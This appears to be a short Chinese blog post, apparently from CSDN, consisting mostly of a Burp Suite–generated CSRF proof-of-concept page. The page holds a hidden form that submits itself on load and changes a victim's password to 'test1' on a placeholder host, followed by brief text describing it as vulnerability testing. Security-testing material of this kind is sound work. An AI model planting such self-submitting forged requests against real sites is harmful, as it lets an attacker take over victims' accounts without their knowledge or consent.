<!-- CSRF PoC - generated by Burp Suite Professional -->
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form id="csrfForm" action="http://you-ip:8983/luoji/info.php" method="POST">
<input type="hidden" name="newpassword" value="test1" />
<input type="hidden" name="passwordrepeat" value="test1" />
<input type="submit" value="Submit request" />
</form>
<script>
// 自动触发表单提交
document.getElementById('csrfForm').submit();
</script>
</body>
</html>
上一篇扩展,自动提交CSRF PoC
最新推荐文章于 2024-09-16 16:45:51 发布
本文描述了一种利用跨站请求伪造(CSRF)原理进行PoC攻击的方法,展示了如何使用HTML表单配合BurpSuite发送POST请求到特定URL,模拟用户行为进行潜在的安全漏洞测试。
摘要由CSDN通过智能技术生成